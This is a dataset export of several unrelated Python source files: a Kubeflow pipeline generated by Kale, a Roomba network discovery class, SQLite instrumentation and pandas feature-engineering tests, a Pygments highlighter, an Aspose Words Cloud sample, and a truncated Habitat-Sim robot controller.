id
stringlengths 3
8
| content
stringlengths 100
981k
|
---|---|
15035
|
import json
import kfp.dsl as _kfp_dsl
import kfp.components as _kfp_components
from collections import OrderedDict
from kubernetes import client as k8s_client
def step1():
from kale.common import mlmdutils as _kale_mlmdutils
_kale_mlmdutils.init_metadata()
from kale.marshal.decorator import marshal as _kale_marshal
from kale.common.runutils import link_artifacts as _kale_link_artifacts
_kale_pipeline_parameters = {}
@_kale_marshal([], ['_b', '_a'], _kale_pipeline_parameters, "/marshal")
def step1():
a = 1
b = 2
return a, b
step1()
_kale_artifacts = {}
_kale_link_artifacts(_kale_artifacts)
_kale_mlmdutils.call("mark_execution_complete")
def step2():
from kale.common import mlmdutils as _kale_mlmdutils
_kale_mlmdutils.init_metadata()
from kale.common.runutils import ttl as _kale_ttl
from kale.marshal.decorator import marshal as _kale_marshal
from kale.common.runutils import link_artifacts as _kale_link_artifacts
_kale_pipeline_parameters = {}
@_kale_ttl(5)
@_kale_marshal(['_b', '_a'], ['_c'], _kale_pipeline_parameters, "/marshal")
def step2(a, b):
c = a + b
print(c)
return c
step2()
_kale_artifacts = {}
_kale_link_artifacts(_kale_artifacts)
_kale_mlmdutils.call("mark_execution_complete")
def step3():
from kale.common import mlmdutils as _kale_mlmdutils
_kale_mlmdutils.init_metadata()
from kale.marshal.decorator import marshal as _kale_marshal
from kale.common.runutils import link_artifacts as _kale_link_artifacts
_kale_pipeline_parameters = {}
@_kale_marshal(['_a', '_c'], [], _kale_pipeline_parameters, "/marshal")
def step3(a, c):
d = c + a
print(d)
step3()
_kale_artifacts = {}
_kale_link_artifacts(_kale_artifacts)
_kale_mlmdutils.call("mark_execution_complete")
_kale_step1_op = _kfp_components.func_to_container_op(step1)
_kale_step2_op = _kfp_components.func_to_container_op(step2)
_kale_step3_op = _kfp_components.func_to_container_op(step3)
@_kfp_dsl.pipeline(
name='test',
description=''
)
def auto_generated_pipeline():
_kale_pvolumes_dict = OrderedDict()
_kale_volume_step_names = []
_kale_volume_name_parameters = []
_kale_marshal_vop = _kfp_dsl.VolumeOp(
name="kale-marshal-volume",
resource_name="kale-marshal-pvc",
modes=['ReadWriteMany'],
size="1Gi"
)
_kale_volume_step_names.append(_kale_marshal_vop.name)
_kale_volume_name_parameters.append(
_kale_marshal_vop.outputs["name"].full_name)
_kale_pvolumes_dict['/marshal'] = _kale_marshal_vop.volume
_kale_volume_step_names.sort()
_kale_volume_name_parameters.sort()
_kale_step1_task = _kale_step1_op()\
.add_pvolumes(_kale_pvolumes_dict)\
.after()
_kale_step_labels = {'common-label': 'true'}
for _kale_k, _kale_v in _kale_step_labels.items():
_kale_step1_task.add_pod_label(_kale_k, _kale_v)
_kale_step_limits = {'amd/gpu': '1'}
for _kale_k, _kale_v in _kale_step_limits.items():
_kale_step1_task.container.add_resource_limit(_kale_k, _kale_v)
_kale_step1_task.container.working_dir = "/test"
_kale_step1_task.container.set_security_context(
k8s_client.V1SecurityContext(run_as_user=0))
_kale_output_artifacts = {}
_kale_step1_task.output_artifact_paths.update(_kale_output_artifacts)
_kale_step1_task.add_pod_label(
"pipelines.kubeflow.org/metadata_written", "true")
_kale_dep_names = (_kale_step1_task.dependent_names +
_kale_volume_step_names)
_kale_step1_task.add_pod_annotation(
"kubeflow-kale.org/dependent-templates", json.dumps(_kale_dep_names))
if _kale_volume_name_parameters:
_kale_step1_task.add_pod_annotation(
"kubeflow-kale.org/volume-name-parameters",
json.dumps(_kale_volume_name_parameters))
_kale_step2_task = _kale_step2_op()\
.add_pvolumes(_kale_pvolumes_dict)\
.after(_kale_step1_task)
_kale_step_labels = {'common-label': 'true'}
for _kale_k, _kale_v in _kale_step_labels.items():
_kale_step2_task.add_pod_label(_kale_k, _kale_v)
_kale_step2_task.set_retry_strategy(
num_retries=5,
retry_policy="Always",
backoff_duration="20",
backoff_factor=2,
backoff_max_duration=None)
_kale_step2_task.container.working_dir = "/test"
_kale_step2_task.container.set_security_context(
k8s_client.V1SecurityContext(run_as_user=0))
_kale_output_artifacts = {}
_kale_step2_task.output_artifact_paths.update(_kale_output_artifacts)
_kale_step2_task.add_pod_label(
"pipelines.kubeflow.org/metadata_written", "true")
_kale_dep_names = (_kale_step2_task.dependent_names +
_kale_volume_step_names)
_kale_step2_task.add_pod_annotation(
"kubeflow-kale.org/dependent-templates", json.dumps(_kale_dep_names))
if _kale_volume_name_parameters:
_kale_step2_task.add_pod_annotation(
"kubeflow-kale.org/volume-name-parameters",
json.dumps(_kale_volume_name_parameters))
_kale_step3_task = _kale_step3_op()\
.add_pvolumes(_kale_pvolumes_dict)\
.after(_kale_step2_task, _kale_step1_task)
_kale_step_annotations = {'step3-annotation': 'test'}
for _kale_k, _kale_v in _kale_step_annotations.items():
_kale_step3_task.add_pod_annotation(_kale_k, _kale_v)
_kale_step_labels = {'common-label': 'true'}
for _kale_k, _kale_v in _kale_step_labels.items():
_kale_step3_task.add_pod_label(_kale_k, _kale_v)
_kale_step3_task.container.working_dir = "/test"
_kale_step3_task.container.set_security_context(
k8s_client.V1SecurityContext(run_as_user=0))
_kale_output_artifacts = {}
_kale_step3_task.output_artifact_paths.update(_kale_output_artifacts)
_kale_step3_task.add_pod_label(
"pipelines.kubeflow.org/metadata_written", "true")
_kale_dep_names = (_kale_step3_task.dependent_names +
_kale_volume_step_names)
_kale_step3_task.add_pod_annotation(
"kubeflow-kale.org/dependent-templates", json.dumps(_kale_dep_names))
if _kale_volume_name_parameters:
_kale_step3_task.add_pod_annotation(
"kubeflow-kale.org/volume-name-parameters",
json.dumps(_kale_volume_name_parameters))
if __name__ == "__main__":
pipeline_func = auto_generated_pipeline
pipeline_filename = pipeline_func.__name__ + '.pipeline.tar.gz'
import kfp.compiler as compiler
compiler.Compiler().compile(pipeline_func, pipeline_filename)
# Get or create an experiment and submit a pipeline run
import kfp
client = kfp.Client()
experiment = client.create_experiment('test')
# Submit a pipeline run
from kale.common import kfputils
pipeline_id, version_id = kfputils.upload_pipeline(
pipeline_filename, "test")
run_result = kfputils.run_pipeline(
experiment_name=experiment.name, pipeline_id=pipeline_id, version_id=version_id)
|
15037
|
import json
import logging
import socket
from roombapy.roomba_info import RoombaInfo
class RoombaDiscovery:
udp_bind_address = ""
udp_address = "<broadcast>"
udp_port = 5678
roomba_message = "irobotmcs"
amount_of_broadcasted_messages = 5
server_socket = None
log = None
def __init__(self):
"""Init discovery."""
self.server_socket = _get_socket()
self.log = logging.getLogger(__name__)
def find(self, ip=None):
if ip is not None:
return self.get(ip)
return self.get_all()
def get_all(self):
self._start_server()
self._broadcast_message(self.amount_of_broadcasted_messages)
robots = set()
while True:
response = self._get_response()
if response:
robots.add(response)
else:
break
return robots
def get(self, ip):
self._start_server()
self._send_message(ip)
return self._get_response(ip)
def _get_response(self, ip=None):
try:
while True:
raw_response, addr = self.server_socket.recvfrom(1024)
if ip is not None and addr[0] != ip:
continue
self.log.debug(
"Received response: %s, address: %s", raw_response, addr
)
data = raw_response.decode()
if self._is_from_irobot(data):
return _decode_data(data)
except socket.timeout:
self.log.info("Socket timeout")
return None
def _is_from_irobot(self, data):
if data == self.roomba_message:
return False
json_response = json.loads(data)
if (
"Roomba" in json_response["hostname"]
or "iRobot" in json_response["hostname"]
):
return True
return False
def _broadcast_message(self, amount):
for i in range(amount):
self.server_socket.sendto(
self.roomba_message.encode(), (self.udp_address, self.udp_port)
)
self.log.debug("Broadcast message sent: " + str(i))
def _send_message(self, udp_address):
self.server_socket.sendto(
self.roomba_message.encode(), (udp_address, self.udp_port)
)
self.log.debug("Message sent")
def _start_server(self):
self.server_socket.bind((self.udp_bind_address, self.udp_port))
self.log.debug("Socket server started, port %s", self.udp_port)
def _decode_data(data):
json_response = json.loads(data)
return RoombaInfo(
hostname=json_response["hostname"],
robot_name=json_response["robotname"],
ip=json_response["ip"],
mac=json_response["mac"],
firmware=json_response["sw"],
sku=json_response["sku"],
capabilities=json_response["cap"],
)
def _get_socket():
server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
server_socket.settimeout(5)
return server_socket
|
15052
|
import sqlite3
import mock
import opbeat.instrumentation.control
from tests.helpers import get_tempstoreclient
from tests.utils.compat import TestCase
class InstrumentSQLiteTest(TestCase):
def setUp(self):
self.client = get_tempstoreclient()
opbeat.instrumentation.control.instrument()
@mock.patch("opbeat.traces.RequestsStore.should_collect")
def test_connect(self, should_collect):
should_collect.return_value = False
self.client.begin_transaction("transaction.test")
conn = sqlite3.connect(":memory:")
cursor = conn.cursor()
cursor.execute("""CREATE TABLE testdb (id integer, username text)""")
cursor.execute("""INSERT INTO testdb VALUES (1, "Ron")""")
cursor.execute("""DROP TABLE testdb""")
self.client.end_transaction("MyView")
transactions, traces = self.client.instrumentation_store.get_all()
expected_signatures = ['transaction', 'sqlite3.connect :memory:',
'CREATE TABLE', 'INSERT INTO testdb',
'DROP TABLE']
self.assertEqual(set([t['signature'] for t in traces]),
set(expected_signatures))
# Reorder according to the kinds list so we can just test them
sig_dict = dict([(t['signature'], t) for t in traces])
traces = [sig_dict[k] for k in expected_signatures]
self.assertEqual(traces[0]['signature'], 'transaction')
self.assertEqual(traces[0]['kind'], 'transaction')
self.assertEqual(traces[0]['transaction'], 'MyView')
self.assertEqual(traces[1]['signature'], 'sqlite3.connect :memory:')
self.assertEqual(traces[1]['kind'], 'db.sqlite.connect')
self.assertEqual(traces[1]['transaction'], 'MyView')
self.assertEqual(traces[2]['signature'], 'CREATE TABLE')
self.assertEqual(traces[2]['kind'], 'db.sqlite.sql')
self.assertEqual(traces[2]['transaction'], 'MyView')
self.assertEqual(traces[3]['signature'], 'INSERT INTO testdb')
self.assertEqual(traces[3]['kind'], 'db.sqlite.sql')
self.assertEqual(traces[3]['transaction'], 'MyView')
self.assertEqual(traces[4]['signature'], 'DROP TABLE')
self.assertEqual(traces[4]['kind'], 'db.sqlite.sql')
self.assertEqual(traces[4]['transaction'], 'MyView')
self.assertEqual(len(traces), 5)
|
15064
|
from pygments import highlight as _highlight
from pygments.lexers import SqlLexer
from pygments.formatters import HtmlFormatter
def style():
style = HtmlFormatter().get_style_defs()
return style
def highlight(text):
# Generated HTML contains unnecessary newline at the end
# before </pre> closing tag.
# We need to remove that newline because it's screwing up
# QTextEdit formatting and is being displayed
# as a non-editable whitespace.
highlighted_text = _highlight(text, SqlLexer(), HtmlFormatter()).strip()
# Split generated HTML by last newline in it
# argument 1 indicates that we only want to split the string
# by one specified delimiter from the right.
parts = highlighted_text.rsplit("\n", 1)
# Glue back 2 split parts to get the HTML without last
# unnecessary newline
highlighted_text_no_last_newline = "".join(parts)
return highlighted_text_no_last_newline
|
15108
|
import os
import asposewordscloud
import asposewordscloud.models.requests
from asposewordscloud.rest import ApiException
from shutil import copyfile
words_api = WordsApi(client_id = '####-####-####-####-####', client_secret = '##################')
file_name = 'test_doc.docx'
# Upload original document to cloud storage.
my_var1 = open(file_name, 'rb')
my_var2 = file_name
upload_file_request = asposewordscloud.models.requests.UploadFileRequest(file_content=my_var1, path=my_var2)
words_api.upload_file(upload_file_request)
# Calls AcceptAllRevisions method for document in cloud.
my_var3 = file_name
request = asposewordscloud.models.requests.AcceptAllRevisionsRequest(name=my_var3)
words_api.accept_all_revisions(request)
|
15129
|
from __future__ import print_function, absolute_import
import unittest, math
import pandas as pd
import numpy as np
from . import *
class T(base_pandas_extensions_tester.BasePandasExtensionsTester):
def test_concat(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'c_2': ['d', 'e', 'f']})
df.engineer('concat(c_1, c_2)')
self.assertTrue(np.array_equal(df['c_concat(c_1,c_2)'].values,
np.array(['ad', 'be', 'cf'], 'object')))
def test_concat_3_cols(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'c_2': ['d', 'e', 'f'], 'c_3': ['h', 'i', 'j']})
df.engineer('concat(c_3, c_1, c_2)')
self.assertTrue(np.array_equal(df['c_concat(c_3,c_1,c_2)'].values,
np.array(['had', 'ibe', 'jcf'], 'object')))
def test_concat_with_numerical_col(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'n_2': [1, 2, 3]})
df.engineer('concat(c_1,n_2)')
self.assertTrue(np.array_equal(df['c_concat(c_1,n_2)'].values,
np.array(['a1', 'b2', 'c3'], 'object')))
def test_concat_with_numerical_col_3_cols(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'n_2': [1, 2, 3], 'n_3': [4, 5, 6]})
df.engineer('concat(n_3,c_1,n_2)')
self.assertTrue(np.array_equal(df['c_concat(n_3,c_1,n_2)'].values,
np.array(['4a1', '5b2', '6c3'], 'object')))
def test_multiplication(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'n_2': [1, 2, 3], 'n_3': [4, 5, 6], 'n_4': [7, 8, 9]})
df.engineer('mult(n_2, n_3)')
self.assertTrue(np.array_equal(df['n_mult(n_2,n_3)'].values,
np.array([4, 10, 18], long)))
def test_multiplication_3_cols(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'n_2': [1, 2, 3], 'n_3': [4, 5, 6], 'n_4': [7, 8, 9]})
df.engineer('mult(n_2, n_3, n_4)')
self.assertTrue(np.array_equal(df['n_mult(n_2,n_3,n_4)'].values,
np.array([4*7, 80, 18*9], long)))
def test_square_on_whole_data_frame(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'n_2': [1, 2, 3], 'n_3': [4, 5, 6], 'n_4': [7, 8, 9]})
df.engineer('pow(2)')
np.testing.assert_array_equal(df.values,
np.array([
['a', 1, 4, 7, 1*1, 4*4, 7*7],
['b', 2, 5, 8, 2*2, 5*5, 8*8],
['c', 3, 6, 9, 3*3, 6*6, 9*9],
], 'object'))
def test_square_on_cols(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'n_2': [1, 2, 3], 'n_3': [4, 5, 6], 'n_4': [7, 8, 9]})
df.engineer('pow(n_3, 2)')
np.testing.assert_array_equal(df.values,
np.array([
['a', 1, 4, 7, 4*4],
['b', 2, 5, 8, 5*5],
['c', 3, 6, 9, 6*6],
], 'object'))
def test_log_on_whole_data_frame(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'n_2': [1, 2, 3], 'n_3': [4, 5, 6], 'n_4': [7, 8, 9]})
df.engineer('lg()')
self.assertTrue(np.array_equal(df.values,
np.array([
['a', 1, 4, 7, math.log(1), math.log(4), math.log(7)],
['b', 2, 5, 8, math.log(2), math.log(5), math.log(8)],
['c', 3, 6, 9, math.log(3), math.log(6), math.log(9)],
], 'object')))
def test_log_on_cols(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'n_2': [1, 2, 3], 'n_3': [4, 5, 6], 'n_4': [7, 8, 9]})
df.engineer('lg(n_3)')
self.assertTrue(np.array_equal(df.values,
np.array([
['a', 1, 4, 7, math.log(4)],
['b', 2, 5, 8, math.log(5)],
['c', 3, 6, 9, math.log(6)],
], 'object')))
def test_sqrt_on_whole_data_frame(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'n_2': [1, 2, 3], 'n_3': [4, 5, 6], 'n_4': [7, 8, 9]})
df.engineer('sqrt()')
self.assertTrue(np.array_equal(df.values,
np.array([
['a', 1, 4, 7, math.sqrt(1), math.sqrt(4), math.sqrt(7)],
['b', 2, 5, 8, math.sqrt(2), math.sqrt(5), math.sqrt(8)],
['c', 3, 6, 9, math.sqrt(3), math.sqrt(6), math.sqrt(9)],
], 'object')))
def test_sqrt_on_cols(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'n_2': [1, 2, 3], 'n_3': [4, 5, 6], 'n_4': [7, 8, 9]})
df.engineer('sqrt(n_3)')
self.assertTrue(np.array_equal(df.values,
np.array([
['a', 1, 4, 7, math.sqrt(4)],
['b', 2, 5, 8, math.sqrt(5)],
['c', 3, 6, 9, math.sqrt(6)],
], 'object')))
def test_rolling_sum_on_single_col(self):
df = pd.DataFrame({'n_1': [10, 12, 13, 15, 2, 12, 34]})
col = 'rolling_sum(n_1,3)'
df.engineer(col)
np.testing.assert_array_equal([np.nan, np.nan, 35, 40, 30, 29, 48], df['n_' + col])
def test_rolling_mean_on_single_col(self):
df = pd.DataFrame({'n_1': [10, 12, 13, 15, 2, 12, 34]})
col = 'rolling_mean(n_1,3)'
df.engineer(col)
np.testing.assert_allclose([np.nan, np.nan, 11.66, 13.33, 10, 9.66, 16], df['n_' + col], rtol=1e-3)
def test_rolling_median_on_single_col(self):
df = pd.DataFrame({'n_1': [10, 12, 13, 15, 2, 12, 34]})
col = 'rolling_median(n_1,3)'
df.engineer(col)
np.testing.assert_array_equal([np.nan, np.nan, 12, 13, 13, 12, 12], df['n_' + col])
def test_rolling_min_on_single_col(self):
df = pd.DataFrame({'n_1': [10, 12, 13, 15, 2, 12, 34]})
col = 'rolling_min(n_1,3)'
df.engineer(col)
np.testing.assert_array_equal([np.nan, np.nan, 10, 12, 2, 2, 2], df['n_' + col])
def test_rolling_max_on_single_col(self):
df = pd.DataFrame({'n_1': [10, 12, 13, 15, 2, 12, 34]})
col = 'rolling_max(n_1,3)'
df.engineer(col)
np.testing.assert_array_equal([np.nan, np.nan, 13, 15, 15, 15, 34], df['n_' + col])
def test_rolling_std_on_single_col(self):
df = pd.DataFrame({'n_1': [10, 12, 13, 15, 2, 12, 34]})
col = 'rolling_std(n_1,3)'
df.engineer(col)
np.testing.assert_allclose([np.nan, np.nan, 1.528, 1.528, 7, 6.807, 16.371], df['n_' + col], rtol=1e-3)
def test_rolling_var_on_single_col(self):
df = pd.DataFrame({'n_1': [10, 12, 13, 15, 2, 12, 34]})
col = 'rolling_var(n_1,3)'
df.engineer(col)
np.testing.assert_allclose([np.nan, np.nan, 2.333, 2.333, 49, 46.333, 268], df['n_' + col], rtol=1e-3)
# Multiple Columns
def test_rolling_sum_on_multi_cols(self):
df = pd.DataFrame({'n_1': [10, 12, 13, 15, 2, 12, 34], 'n_2': [1, 2, 3, 5, 2, 2, 4]})
col = 'rolling_sum(3)'
df.engineer(col)
np.testing.assert_array_equal([np.nan, np.nan, 35, 40, 30, 29, 48], df['n_rolling_sum(n_1,3)'])
np.testing.assert_array_equal([np.nan, np.nan, 6, 10, 10, 9, 8], df['n_rolling_sum(n_2,3)'])
def test_rolling_mean_on_multi_cols(self):
df = pd.DataFrame({'n_1': [10, 12, 13, 15, 2, 12, 34], 'n_2': [1, 2, 3, 5, 2, 2, 4]})
col = 'rolling_mean(3)'
df.engineer(col)
np.testing.assert_allclose([np.nan, np.nan, 11.66, 13.33, 10, 9.66, 16], df['n_rolling_mean(n_1,3)'], rtol=1e-3)
np.testing.assert_allclose([np.nan, np.nan, 2, 3.333, 3.333, 3, 2.666], df['n_rolling_mean(n_2,3)'], rtol=1e-3)
def test_rolling_median_on_multi_cols(self):
df = pd.DataFrame({'n_1': [10, 12, 13, 15, 2, 12, 34], 'n_2': [1, 2, 3, 5, 2, 2, 4]})
col = 'rolling_median(3)'
df.engineer(col)
np.testing.assert_array_equal([np.nan, np.nan, 12, 13, 13, 12, 12], df['n_rolling_median(n_1,3)'])
np.testing.assert_array_equal([np.nan, np.nan, 2, 3, 3, 2, 2], df['n_rolling_median(n_2,3)'])
def test_rolling_min_on_multi_cols(self):
df = pd.DataFrame({'n_1': [10, 12, 13, 15, 2, 12, 34], 'n_2': [1, 2, 3, 5, 2, 2, 4]})
col = 'rolling_min(3)'
df.engineer(col)
np.testing.assert_array_equal([np.nan, np.nan, 10, 12, 2, 2, 2], df['n_rolling_min(n_1,3)'])
np.testing.assert_array_equal([np.nan, np.nan, 1, 2, 2, 2, 2], df['n_rolling_min(n_2,3)'])
def test_rolling_max_on_multi_cols(self):
df = pd.DataFrame({'n_1': [10, 12, 13, 15, 2, 12, 34], 'n_2': [1, 2, 3, 5, 2, 2, 4]})
col = 'rolling_max(3)'
df.engineer(col)
np.testing.assert_array_equal([np.nan, np.nan, 13, 15, 15, 15, 34], df['n_rolling_max(n_1,3)'])
np.testing.assert_array_equal([np.nan, np.nan, 3, 5, 5, 5, 4], df['n_rolling_max(n_2,3)'])
def test_rolling_std_on_multi_cols(self):
df = pd.DataFrame({'n_1': [10, 12, 13, 15, 2, 12, 34], 'n_2': [1, 2, 3, 5, 2, 2, 4]})
col = 'rolling_std(3)'
df.engineer(col)
np.testing.assert_allclose([np.nan, np.nan, 1.528, 1.528, 7, 6.807, 16.371], df['n_rolling_std(n_1,3)'], rtol=1e-3)
np.testing.assert_allclose([np.nan, np.nan, 1, 1.528, 1.528, 1.732, 1.1547], df['n_rolling_std(n_2,3)'], rtol=1e-3)
def test_rolling_var_on_multi_cols(self):
df = pd.DataFrame({'n_1': [10, 12, 13, 15, 2, 12, 34], 'n_2': [1, 2, 3, 5, 2, 2, 4]})
col = 'rolling_var(3)'
df.engineer(col)
np.testing.assert_allclose([np.nan, np.nan, 2.333, 2.333, 49, 46.333, 268], df['n_rolling_var(n_1,3)'], rtol=1e-3)
np.testing.assert_allclose([np.nan, np.nan, 1, 2.333, 2.333, 3, 1.333], df['n_rolling_var(n_2,3)'], rtol=1e-3)
def test_method_chaining(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'c_2':['d', 'e', 'f'],
'n_2': [1, 2, 3], 'n_3': [4, 5, 6], 'n_4': [7, 8, 9]})
df.\
engineer('concat(c_1, c_2)').\
engineer('concat(c_1, n_2)').\
engineer('mult(n_2, n_3)').\
engineer('lg(n_2)').\
engineer('pow(n_3, 2)')
self.assertTrue(np.array_equal(df.values,
np.array([
['a', 'd', 1, 4, 7, 'ad', 'a1', 4, math.log(1), 4*4],
['b', 'e', 2, 5, 8, 'be', 'b2', 10, math.log(2), 5*5],
['c', 'f', 3, 6, 9, 'cf', 'c3', 18, math.log(3), 6*6]
], 'object')))
def test_chaining_single_call_semi_col_sep(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'c_2':['d', 'e', 'f'],
'n_2': [1, 2, 3], 'n_3': [4, 5, 6], 'n_4': [7, 8, 9]})
df.engineer('concat(c_1, c_2);concat(c_1, n_2);mult(n_2, n_3);lg(n_2);pow(n_3, 2)')
self.assertTrue(np.array_equal(df.values,
np.array([
['a', 'd', 1, 4, 7, 'ad', 'a1', 4, math.log(1), 4*4],
['b', 'e', 2, 5, 8, 'be', 'b2', 10, math.log(2), 5*5],
['c', 'f', 3, 6, 9, 'cf', 'c3', 18, math.log(3), 6*6]
], 'object')))
def test_chaining_single_with_arr_arg(self):
df = pd.DataFrame({'c_1':['a', 'b', 'c'], 'c_2':['d', 'e', 'f'],
'n_2': [1, 2, 3], 'n_3': [4, 5, 6], 'n_4': [7, 8, 9]})
df.engineer('concat(c_1, c_2);concat(c_1, n_2);mult(n_2, n_3);lg(n_2);pow(n_3, 2)'.split(';'))
self.assertTrue(np.array_equal(df.values,
np.array([
['a', 'd', 1, 4, 7, 'ad', 'a1', 4, math.log(1), 4*4],
['b', 'e', 2, 5, 8, 'be', 'b2', 10, math.log(2), 5*5],
['c', 'f', 3, 6, 9, 'cf', 'c3', 18, math.log(3), 6*6]
], 'object')))
def test_long_method_chains(self):
df1 = pd.DataFrame({'n_1': [1, 2, 3], 'n_2': [4, 5, 6]})
df2 = pd.DataFrame({'n_1': [1, 2, 3], 'n_2': [4, 5, 6]})
df1.engineer('mult(lg(mult(n_1, n_2)), lg(pow(n_1, 3)))')
df2.engineer('mult(n_1,n_2);pow(n_1,3)')
df2.engineer('lg(pow(n_1,3));lg(mult(n_1, n_2))')
df2.engineer('mult(lg(mult(n_1,n_2)),lg(pow(n_1, 3)))')
np.testing.assert_array_equal(df1.columns.values.sort(), df2.columns.values.sort());
np.testing.assert_array_equal(df1['n_mult(n_1,n_2)'].values, df2['n_mult(n_1,n_2)'].values);
np.testing.assert_array_equal(df1['n_pow(n_1,3)'], df2['n_pow(n_1,3)']);
np.testing.assert_array_equal(df1['n_lg(pow(n_1,3))'], df2['n_lg(pow(n_1,3))']);
np.testing.assert_array_equal(df1['n_lg(mult(n_1,n_2))'], df2['n_lg(mult(n_1,n_2))']);
np.testing.assert_array_equal(df1['n_mult(lg(mult(n_1,n_2)),lg(pow(n_1,3)))'], df2['n_mult(lg(mult(n_1,n_2)),lg(pow(n_1,3)))']);
|
15131
|
import numpy as np
import math
import pyrobot.utils.util as prutil
import rospy
import habitat_sim.agent as habAgent
import habitat_sim.utils as habUtils
from habitat_sim.agent.controls import ActuationSpec
import habitat_sim.errors
import quaternion
from tf.transformations import euler_from_quaternion, euler_from_matrix
class LoCoBotBase(object):
"""docstring for SimpleBase"""
def __init__(self, configs, simulator):
self.configs = configs
self.sim = simulator.sim
self.agent = self.sim.get_agent(self.configs.COMMON.SIMULATOR.DEFAULT_AGENT_ID)
self.transform = None
self.init_state = self.get_full_state()
def execute_action(self, action_name, actuation):
# actions = "turn_right" or "turn_left" or "move_forward"
# returns a bool showing if collided or not
return self._act(action_name, actuation)
def get_full_state(self):
# Returns habitat_sim.agent.AgentState
return self.agent.get_state()
def _rot_matrix(self, habitat_quat):
quat_list = [habitat_quat.x, habitat_quat.y, habitat_quat.z, habitat_quat.w]
return prutil.quat_to_rot_mat(quat_list)
def get_state(self, state_type="odom"):
# Returns (x, y, yaw)
assert state_type == "odom", "Error: Only Odom state is available"
cur_state = self.get_full_state()
init_rotation = self._rot_matrix(self.init_state.rotation)
# true position here refers to the relative position from
# where `self.init_state` is treated as origin
true_position = cur_state.position - self.init_state.position
true_position = np.matmul(init_rotation.transpose(), true_position, dtype=np.float64)
cur_rotation = self._rot_matrix(cur_state.rotation)
cur_rotation = np.matmul(init_rotation.transpose(), cur_rotation, dtype=np.float64)
(r, pitch, yaw) = euler_from_matrix(cur_rotation, axes="sxzy")
# Habitat has y perpendicular to map where as ROS has z perpendicular
# to the map. Where as x is same.
# Here ROS_X = -1 * habitat_z and ROS_Y = -1*habitat_x
return (-1 * true_position[2], -1 * true_position[0], yaw)
def stop(self):
raise NotImplementedError("Veclocity control is not supported in Habitat-Sim!!")
def set_vel(self, fwd_speed, turn_speed, exe_time=1):
raise NotImplementedError("Veclocity control is not supported in Habitat-Sim!!")
def go_to_relative(
self, xyt_position, use_map=False, close_loop=False, smooth=False
):
"""
Moves the robot to the robot to given
goal state relative to its initial pose.
:param xyt_position: The relative goal state of the form (x,y,t)
:param use_map: When set to "True", ensures that controler is
using only free space on the map to move the robot.
:param close_loop: When set to "True", ensures that controler is
operating in open loop by
taking account of odometry.
:param smooth: When set to "True", ensures that the motion
leading to the goal is a smooth one.
:type xyt_position: list
:type use_map: bool
:type close_loop: bool
:type smooth: bool
:return: True if successful; False otherwise (timeout, etc.)
:rtype: bool
"""
try:
if use_map:
raise NotImplementedError(
"Using map feature is not yet supported for Habitat-Sim"
)
if close_loop:
raise NotImplementedError(
"Closed-loop postion control is not supported in Habitat-Sim!"
)
if smooth:
raise NotImplementedError(
"Smooth position control feature is not yet for Habitat-Sim"
)
except Exception as error:
print(error)
return False
(cur_x, cur_y, cur_yaw) = self.get_state()
abs_yaw = cur_yaw + xyt_position[2]
return self._go_to_relative_pose(xyt_position[0], xyt_position[1], abs_yaw)
def go_to_absolute(
self, xyt_position, use_map=False, close_loop=False, smooth=False
):
"""
Moves the robot to the robot to given goal state in the world frame.
:param xyt_position: The goal state of the form (x,y,t)
in the world (map) frame.
:param use_map: When set to "True", ensures that controler is using
only free space on the map to move the robot.
:param close_loop: When set to "True", ensures that controler is
operating in open loop by
taking account of odometry.
:param smooth: When set to "True", ensures that the motion
leading to the goal is a smooth one.
:type xyt_position: list
:type use_map: bool
:type close_loop: bool
:type smooth: bool
:return: True if successful; False otherwise (timeout, etc.)
:rtype: bool
"""
try:
if use_map:
raise NotImplementedError(
"Using map feature is not yet supported for Habitat-Sim"
)
if close_loop:
raise NotImplementedError(
"Closed-loop postion control is not supported in Habitat-Sim!"
)
if smooth:
raise NotImplementedError(
"Smooth position control feature is not yet for Habitat-Sim"
)
except Exception as error:
print(error)
return False
(cur_x, cur_y, cur_yaw) = self.get_state()
rel_X = xyt_position[0] - cur_x
rel_Y = xyt_position[1] - cur_y
abs_yaw = xyt_position[2]
# convert rel_X & rel_Y from global frame to current frame
R = np.array([[np.cos(cur_yaw), np.sin(cur_yaw)],
[-np.sin(cur_yaw), np.cos(cur_yaw)]])
rel_x, rel_y = np.matmul(R, np.array([rel_X, rel_Y]).reshape(-1,1))
return self._go_to_relative_pose(rel_x[0], rel_y[0], abs_yaw)
def _act(self, action_name, actuation):
"""Take the action specified by action_id
:param action_id: ID of the action. Retreives the action from
`agent_config.action_space <AgentConfiguration.action_space>`
:return: Whether or not the action taken resulted in a collision
"""
did_collide = False
act_spec = ActuationSpec(actuation)
did_collide = self.agent.controls.action(
self.agent.scene_node, action_name, act_spec, apply_filter=True
)
return did_collide
def _go_to_relative_pose(self, rel_x, rel_y, abs_yaw):
# clip relative movements beyond 10 micrometer precision
# this is done to improve determinism, as habitat-sim doesn't
# seem to precisely move the robot beyond sub milimeter precision anyways
if abs(rel_x) < 1e-5:
rel_x = 0
if abs(rel_y) < 1e-5:
rel_y = 0
if math.sqrt(rel_x ** 2 + rel_y ** 2) > 0.0:
# rotate to point to (x, y) point
action_name = "turn_left"
if rel_y < 0.0:
action_name = "turn_right"
v1 = np.asarray([1, 0], dtype=np.float64)
v2 = np.asarray([rel_x, rel_y], dtype=np.float64)
cosine_angle = np.dot(v1, v2) / (np.linalg.norm(v1) * np.linalg.norm(v2))
angle = np.arccos(cosine_angle)
did_collide = self._act(action_name, math.degrees(angle))
if did_collide:
print("Error: Collision accured while 1st rotating!")
return False
# move to (x,y) point
